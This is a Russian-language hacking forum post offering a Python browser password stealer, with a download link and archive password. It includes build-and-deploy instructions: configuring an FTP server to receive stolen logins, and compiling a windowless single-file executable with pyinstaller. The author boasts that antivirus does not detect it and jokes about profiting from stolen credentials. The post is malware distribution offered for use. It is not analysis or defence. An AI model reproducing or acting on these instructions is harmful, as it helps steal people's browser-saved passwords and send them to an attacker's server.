Трояны Стиллер паролей браузеров

  • Автор темы Kryptoman
  • Дата начала
  • Просмотров 8063 Просмотров
  • Внимание! В разделе большое количество не проверенных программ. Мы не рекомендуем использовать их на основном ПК, без предварительной проверки.

Kryptoman

Новорег
7
2
9 Янв 2019
Приветсвую вас форумчане. Порылся у себя и нашел мой самый первый стиллер, написаный этак в 2015 и на удивление, без всяких правок - он работает, и работает отлично, антивири не палят, пока что... Да, конечно, понимаю, python не самый лучший выбор, я не знаю чем я тогда руководствовался.
Ссылка на архив с исходниками Для просмотра ссылки Войди или Зарегистрируйся , пароль: iphoneshit273 .

Обычный стиллер, заливает текстовый файл с логами вида:

URL: sourlsite.com/login.php
LOGIN: mystpdnick
PASSWORD: mysecrespass

Поддержка: Chrome, Opera, Amigo, Kometa, Vivaldi, Orbitum, Comodo, Torch.
В текстовом файле по ftp на ваш сервер, бесплатных хостингов предостаточно, не знаю можно ли их тут публиковать, а то подумают что пиар какой-нить... Найти их не сложно. Если администрация разрешит опубликую позже, ниже.
Краткая инструкция.
1. Устанавливаем python 3.6, устанавливаем библиотеки с req.txt
Код:
pip install -r req.txt

2. Открываем main.py любым текстовым редактором, видим переменные HOST, USERNAME, PASSWORD. Вместо того конченного бреда что я там написал, пишите свои данные с хостинга.

3. Выбираем любой компилятор python, я бы советовал использовать cx_freeze, но для простоты в статье буду юзать pyinstaller.

pyinstaller --windowed --onefile main.py

4. Ваш билд в папке dist, а айфон под подушкой. Удачи.;)

68747470733a2f2f696d672e776f6e646572686f77746f2e636f6d2f696d672f32322f34342f363335373331353135...jpg
 

rtyn

Эксперт
601
940
8 Апр 2016
  • Внимание, Мошенник!
    Пользователь был уличен в мошенничестве. Мы не рекомендуем совершать сделки с ним!
  • Похожие темы